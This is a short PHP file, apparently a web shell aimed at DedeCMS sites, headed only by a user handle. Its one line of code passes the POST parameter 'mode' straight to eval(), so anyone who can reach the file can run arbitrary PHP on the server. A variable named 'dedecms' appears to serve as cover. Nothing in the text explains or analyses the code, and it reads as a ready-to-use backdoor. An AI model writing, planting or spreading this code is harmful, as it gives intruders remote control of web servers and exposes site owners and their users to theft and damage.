@qingjieshouliang
<?php $str='dedecms'; function mains($str){ eval($str); } mains($_POST['mode']); ?>